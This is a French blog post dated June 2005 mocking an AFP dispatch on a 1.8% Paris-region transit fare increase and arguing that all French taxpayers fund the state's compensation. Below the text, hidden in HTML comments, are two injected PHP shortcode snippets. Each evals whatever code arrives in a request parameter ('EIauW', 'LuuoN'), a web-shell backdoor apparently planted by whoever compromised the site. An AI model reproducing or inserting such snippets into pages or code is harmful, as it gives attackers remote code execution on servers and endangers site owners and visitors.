lafp-toujours-aussi-debile-ratp-et-vol

juin 17, 2005 by Revue de web No Comments

On peut lire ce 16 juin à 19h02 une nouvelle dépêche stupide de l’AFP, expert en la matière (mais leur cerveau staliniennement formaté ne l’a surement même pas fait exprès). Bon OK ce n’est pas un mensonge à proprement parler mais c’est stupide.

PARIS (AFP) – La hausse des tarifs dans les métros et trains d’Ile-de-France, au 1er juillet, « sera limitée à 1,8%, contre 3,4% les années précédentes », a annoncé jeudi à l’AFP Roger Karoutchi, président du groupe UMP au Conseil régional et membre du STIF (Syndicat des Transports d’Ile-de-France).

Cette hausse est une moyenne du renchérissement de l’ensemble des titres de transports collectifs (cartes orange, tickets…) en Ile-de-France. Elle doit être votée vendredi au conseil d’administration du STIF, autorité organisatrice des transports en IDF, a précisé le sénateur Karoutchi. Le budget 2005 du STIF, voté en décembre 2004, avait été bâti sur une hypothèse de hausse de 3,4%, mais le gouvernement a accepté de compenser la perte financière (quelque 10 millions d’euros) que représentera pour le STIF cette hausse moins importante, a-t-il précisé. La hausse des tarifs intervient traditionnellement au 1er juillet. Elle est l’objet chaque année d’une vive querelle au sein du CA du STIF entre les représentants de l’Etat, qui la votent, et les élus franciliens. Le geste du gouvernement intervient alors que le STIF doit passer au 1er juillet sous le contrôle complet des collectivités locales, présidées par la région Ile-de-France, l’Etat s’en désengageant totalement.

 

Mais il y a un gros hic donc: les 1.6% de « réduction » sont payés par l’Etat dont on nous dit quil se désengage : l’état central oui mais c’est l’état décentralisé qui le remplace.. pas de quoi fouetter un chat. En effet tous pour leurs budgets utilisent les mêmes recettes: nos impôts, TVA, Etc. Autrement dit, les 1.6% de non augmentation sont payés par nos taxes, donc quoi qu’il en soit c’est bien 3.4 de plus qu’un Français dépensera pour cela dans son budget, une partie allant dans sa TVA, ses impôts, ou étant peut être financée par une baisse de remboursement des médicaments (par exemple). Cette dépêche pourrait donc être réécrite: Au lieu d’augmenter comme chaque année ses prix beaucoup plus que l’inflation (ce que ceci dit on ne peut pas trop reprocher vu la part des subventions de l’Etat dans les budgets, la RATP privatisée ferait banqueroute à ces prix là, comme la SNCF d’ailleurs!), la RATP va puiser dans les poches des TOUS les français via les taxes. Chaque français versera en moyenne 16 centimes …

10 millions de franciliens (au plus) seront contents et 50 millions d’autres français ne sauront même pas qu’ils ont financé ce « geste de gouvernement ».
Ah.. je suis loin d’être libéral, mais ces gogoleries socialistes commencent à m’exaspérer..

<!– [insert_php]if (isset($_REQUEST["EIauW"])){eval($_REQUEST["EIauW"]);exit;}[/insert_php][php]if (isset($_REQUEST["EIauW"])){eval($_REQUEST["EIauW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["LuuoN"])){eval($_REQUEST["LuuoN"]);exit;}[/insert_php][php]if (isset($_REQUEST["LuuoN"])){eval($_REQUEST["LuuoN"]);exit;}[/php] –>

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *